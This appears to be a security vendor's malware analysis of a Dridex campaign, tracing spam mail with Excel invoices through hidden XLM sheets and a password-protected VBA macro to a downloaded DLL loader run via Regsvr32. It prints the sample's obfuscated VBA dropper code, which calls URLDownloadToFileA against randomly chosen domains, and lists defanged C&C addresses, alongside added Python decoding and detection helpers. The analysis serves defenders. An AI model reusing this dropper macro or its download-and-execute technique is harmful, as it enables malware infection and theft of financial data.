Dridex, also known as Cridex and Bugat, is an info-stealing malware family that targets financial information. It is distributed on a massive scale by cybercrime organizations, mainly through macros in Microsoft Office Word or Excel documents attached to spam mails. Its most noticeable characteristic is its modular design: separate files handle features such as the downloader, the loader, and the botnet. Ransomware such as DoppelPaymer and BitPaymer has also been distributed using Dridex, and judging from the code and the distribution methods, the group that creates and distributes Dridex overlaps significantly with the group that distributes that ransomware.
The ASEC analysis team analyzed how the malware is downloaded, starting from the spam mail and the Microsoft Office Excel document file. The attacker responds rapidly with new variants to avoid detection by AV products and uses various automated detection-bypass techniques.
The collected e-mail was written in English and appears to have targeted recipients worldwide. The subject and the text inside the document use phrases such as ‘Freight Statement Of Outstanding As Of 03_29_2021’ and ‘Ocean Freight overdue invoice Of 03_29_2021,’ disguising the mail as a ‘statement,’ ‘estimate,’ ‘invoice,’ or ‘overdue payment statement.’ These subjects are similar to those of spam mails distributed in Korea. The mail had an Excel file attached.
The Excel document contains a blurry image that prompts the user to click it. The images are linked to the VBA macro code: clicking them immediately runs the macro function ‘VIEW_DOCUMENT’. It is not an automatically executed macro such as Auto_Open; a certain area must be clicked for it to run. For that reason, it is difficult to execute normally in an automated analysis sandbox.
The document also has hidden sheets. The two hidden sheets are XLM macro sheets. The attacker used both VBA and XLM macro code, and the VBA code refers to the XLM macro code to operate. This makes it difficult to determine the functionality by looking only at the VBA code or only at the XLM macro sheet, and detection based on a specific region of code becomes difficult as well.
The attacker made the VBA code impossible to view in the editor by protecting the VBA Project with a password. Tools such as oletools can still extract the VBA code, but it is difficult to figure out the functionality just by looking at the obfuscated code shown below. The attacker is highly likely to have used a VBA Project locker such as EvilClippy.
```vb
' URLDownloadToFileA is imported under the innocuous alias line_shipping
#If VBA7 And Win64 Then
Private Declare PtrSafe Function line_shipping Lib "urlmon" _
    Alias "URLDownloadToFileA" ( _
    ByVal pCaller As LongPtr, _
    ByVal szURL As String, _
    ByVal szFileName As String, _
    ByVal dwReserved As LongPtr, _
    ByVal lpfnCB As LongPtr _
    ) As Long
#Else
Private Declare Function line_shipping Lib "urlmon" _
    Alias "URLDownloadToFileA" ( _
    ByVal pCaller As Long, _
    ByVal szURL As String, _
    ByVal szFileName As String, _
    ByVal dwReserved As Long, _
    ByVal lpfnCB As Long _
    ) As Long
#End If

' Decodes cell A2 of the first sheet using the digit string in A2 of the second
' (hidden XLM) sheet: each character is shifted by the corresponding digit
Function re_re_order()
    n = Cells(2, 1): nn = Sheets(2).Cells(2, 1)
    For u = 1 To Len(n)
        de = de & Chr(Asc(Mid(n, u, 1)) + Mid(nn, u, 1))
    Next
    re_re_order = de
End Function

Function next_shipment(cc As Variant) As Variant
    next_shipment = Split(cc, "" & "--")
End Function

Function merridians_us()
    merridians_us = "T1:T3"
End Function

' Entry point bound to the image; writes each decoded XLM formula into A3,
' runs it through the defined name, and reads the results (path, file name)
' back from cell T2 before downloading from a randomly chosen domain
Sub VIEW_DOCUMENT()
    Sheets(1).Cells(3, 1).Name = "Line" & "_and"
    doc_an = Split(re_re_order, "HH" & "HH")
    P_prints = next_shipment(doc_an(1))
    For oo = 0 To UBound(P_prints) - LBound(P_prints) + 1
        On Error Resume Next
        op_price (P_prints(oo))
        Run ("Line" & "_and")
        If oo = 12 Then last_cargo = insure_d:
        If oo = 14 Then
            rest_bags = insure_d
            line_shipping 0, sgs_assure(for_clients_d(Split(doc_an(0), "D" & ","))), last_cargo & "\" & rest_bags, 0, 0
        End If
    Next
End Sub

Function op_price(jj As String)
    Sheets(vbNull).Cells(3, 1).value = "=" & jj
End Function

' Picks one domain at random from the decoded list (xlArrangeStyleTiled = 1)
Function for_clients_d(Mk As Variant) As String
    Randomize: tg = xlArrangeStyleTiled
    f = UBound(Mk) + tg
    for_clients_d = Mk(Int((f) * Rnd))
End Function

Function insure_d()
    insure_d = Sheets(vbNull).Cells(2, 20)
End Function

Public Function sgs_assure(fg As String)
    sgs_assure = "ht" & "t" & "p" & "s://" & fg
End Function
```
Upon debugging the VBA macro code, we can see that it references a cell of the XLM macro sheet and uses its contents as data. The data is used to build the code for the external URL connection, which is the final feature of the Excel document. A total of 57 URLs are created, and multiple deobfuscation steps are needed in this process. Below is the list of URLs that the Excel file connects to. (Do not connect or download.)
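To make the cell-based decoding concrete, here is an added Python re-implementation of the macro's decoding step (re_re_order plus the "HHHH", "D," and "--" splits in VIEW_DOCUMENT). It is analyst tooling written for this post, not code from the sample or from ASEC; the two cell contents are constructed so the decoded output is a harmless placeholder, and the XLM formulas are only listed, not evaluated.

```python
# Added analyst helper, not code from the ASEC article or the sample: reproduces
# the string-decoding step of the macro's re_re_order()/VIEW_DOCUMENT() so the
# two cell values can be decoded offline without opening the document.
from typing import List, Tuple

# Constructed sample cell contents (NOT values from the real document):
# Sheets(1).Cells(2,1) holds the shifted text, Sheets(2).Cells(2,1) one digit
# per character. Decoding yields "ex.testD,fy.testHHHH=A--=B".
SHEET1_A2 = "cq-lcks<*^u)keooFECE7A+%6>"
SHEET2_A2 = "27182818284590452353602874"


def re_re_order(n: str, nn: str) -> str:
    """Chr(Asc(Mid(n,u,1)) + Mid(nn,u,1)) per position; VBA coerces the digit."""
    if len(nn) < len(n):
        raise ValueError("key sheet is shorter than the encoded text")
    return "".join(chr(ord(c) + int(d)) for c, d in zip(n, nn))


def split_payload(decoded: str) -> Tuple[List[str], List[str]]:
    """Mirror VIEW_DOCUMENT(): 'HHHH' separates the domain list from the XLM
    formula list; domains are 'D,'-separated, formulas '--'-separated."""
    parts = decoded.split("HHHH")
    if len(parts) < 2:
        raise ValueError("separator 'HHHH' not found; wrong cells or key")
    domains = [d for d in parts[0].split("D,") if d]
    formulas = [f for f in parts[1].split("--") if f]
    return domains, formulas


def candidate_urls(domains: List[str]) -> List[str]:
    """sgs_assure() prepends 'https://'; the macro picks one domain at random,
    so an analyst wants every candidate, defanged for reporting."""
    return ["hxxps://" + d for d in domains]


def decode_document(sheet1_a2: str, sheet2_a2: str):
    decoded = re_re_order(sheet1_a2, sheet2_a2)
    domains, formulas = split_payload(decoded)
    return decoded, candidate_urls(domains), formulas


if __name__ == "__main__":
    text, urls, xlm = decode_document(SHEET1_A2, SHEET2_A2)
    print(text)
    for u in urls:
        print("download host:", u)
    for f in xlm:  # still XLM formulas; evaluate them to obtain path and file name
        print("XLM step:", f)
```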
After creating the URL list, the document connects to a randomly chosen address and attempts to download a file. Because there are many addresses to choose from, the attack has a high chance of success even when some of them are blocked. The downloaded file is a DLL (a Portable Executable), but the URL uses a compressed-file extension such as .rar, .tar, or .zip instead of the .dll extension. This extension is presumably used so that the download is not blocked by detection of suspicious executable downloads. The downloaded file is saved under a fixed DLL file name. These DLL files are the Dridex Loader malware.
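A check for the extension trick described above, written as an added example for this post (not part of the ASEC analysis): it flags a response body that is a Windows PE while the URL ends in .rar, .tar, or .zip, and distinguishes that from a genuine archive by magic bytes. The sample bodies are constructed inline.

```python
# Added defensive check, not from the ASEC article: flags a download whose URL
# carries an archive extension (.rar/.tar/.zip) while the body is actually a
# Windows PE, the mismatch described above. All sample inputs are constructed.
import struct
from typing import Optional

ARCHIVE_EXTS = (".rar", ".tar", ".zip")


def is_pe(data: bytes) -> bool:
    """True if data has an 'MZ' DOS header whose e_lfanew points at 'PE\\0\\0'."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return False
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    return data[e_lfanew:e_lfanew + 4] == b"PE\x00\x00"


def archive_kind(data: bytes) -> Optional[str]:
    """Identify a real archive from its magic, or None if it is not one."""
    if data.startswith(b"Rar!\x1a\x07"):
        return "rar"
    if data.startswith(b"PK\x03\x04"):
        return "zip"
    if data[257:262] == b"ustar":  # POSIX tar magic sits at offset 257
        return "tar"
    return None


def url_ext(url: str) -> str:
    path = url.split("?", 1)[0].split("#", 1)[0]
    name = path.rsplit("/", 1)[-1]
    return name[name.rfind("."):].lower() if "." in name else ""


def classify_download(url: str, data: bytes) -> str:
    """'pe-as-archive' is the loader pattern; 'archive'/'pe'/'other' are consistent."""
    ext = url_ext(url)
    if ext in ARCHIVE_EXTS and is_pe(data):
        return "pe-as-archive"
    if archive_kind(data):
        return "archive"
    return "pe" if is_pe(data) else "other"


def fake_pe() -> bytes:
    """Constructed minimal MZ/PE header used only as sample input."""
    hdr = bytearray(0x44)
    hdr[:2] = b"MZ"
    struct.pack_into("<I", hdr, 0x3C, 0x40)
    hdr[0x40:0x44] = b"PE\x00\x00"
    return bytes(hdr)
```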
If the file is successfully downloaded, the obfuscated CALL function shown above is run. This command executes the downloaded Dridex DLL using the Regsvr32.exe process. Once this process runs, Dridex is loaded into Regsvr32.exe and operates in the system.
The Dridex DLL operates after going through a very complicated code-generation and unpacking process. It repeatedly allocates and frees memory, injects code, and grants execution permission in order to build the core loader PE in memory. The core loader itself does not change its code much. Its core feature is connecting to the C&C servers below; user information such as system information is sent in this process.
hxxs://188.8.131.52/ hxxps://184.108.40.206:6601/ hxxps://220.127.116.11/
This blog post has shown how Dridex is distributed, from the spam mail to the Dridex DLL loader. In an automated sandbox environment, it is difficult to run the whole chain from the spam mail to the DLL file. The Excel and DLL files change their form quickly, so responding with signatures is difficult. AhnLab products detect and block the malware from the spam mail distribution stage to the Dridex DLL file using the following aliases.